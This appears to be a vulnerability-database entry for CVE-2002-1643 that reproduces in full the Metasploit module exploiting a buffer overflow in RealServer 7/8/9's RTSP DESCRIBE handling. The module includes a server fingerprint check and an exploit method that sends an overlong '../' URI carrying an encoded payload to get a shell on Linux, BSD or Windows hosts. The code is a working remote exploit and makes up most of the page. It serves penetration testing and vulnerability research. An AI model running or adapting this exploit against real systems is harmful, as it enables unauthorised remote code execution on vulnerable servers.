Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitHdm <[email protected]>MSF:EXPLOIT-MULTI-REALSERVER-DESCRIBE-
HistoryDec 28, 2006 - 11:42 p.m.

RealServer Describe Buffer Overflow

2006-12-2823:42:36
hdm <[email protected]>
www.rapid7.com
61

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk’s THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealServer Describe Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in RealServer 7/8/9
        and was based on Johnny Cyberpunk's THCrealbad exploit. This
        code should reliably exploit Linux, BSD, and Windows-based
        servers.
      },
      'Author'         => 'hdm',
      'References'     =>
        [
          [ 'CVE', '2002-1643' ],
          [ 'OSVDB', '4468']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 2000,
          'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
        },
      'Platform'       => %w{ bsd linux win },
      'Targets'        =>
        [
          [
            'Universal',
            {
              'Platform' => %w{ bsd linux win }
            },
          ],
        ],
      'DisclosureDate' => '2002-12-20',
      'DefaultTarget' => 0))
  end

  def check
    res = send_request_raw(
      {
        'method' => 'OPTIONS',
        'proto'  => 'RTSP',
        'version' => '1.0',
        'uri'    => '/'
      }, 5)

    info = http_fingerprint({ :response => res })  # check method / Custom server check
    if res and res['Server']
      vprint_status("Found RTSP: #{res['Server']}")
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("RealServer universal exploit launched against #{rhost}")
    print_status("Kill the master rmserver pid to prevent shell disconnect")

    encoded = Rex::Text.to_hex(payload.encoded, "%")

    res = send_request_raw({
      'method' => 'DESCRIBE',
      'proto'  => 'RTSP',
      'version' => '1.0',
      'uri'    => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
    }, 5)

    handler
  end
end

Related

cvelist 1
exploitdb 3
cve 1
nvd 1
cvelist
cvelist
CVE-2002-1643
2005-03-28 05:00:00
exploitdb
exploitdb
RealServer &lt; 8.0.2 (Windows Platforms) - Remote Overflow
2003-04-30 00:00:00
RealServer 7-9 - Describe Buffer Overflow (Metasploit)
2002-12-20 00:00:00
RealServer - Describe Buffer Overflow (Metasploit)
2010-08-07 00:00:00
cve
cve
CVE-2002-1643
2005-03-28 05:00:00
nvd
nvd
CVE-2002-1643
2002-12-19 05:00:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON
Related for MSF:EXPLOIT-MULTI-REALSERVER-DESCRIBE-
cvelist1exploitdb3cve1nvd1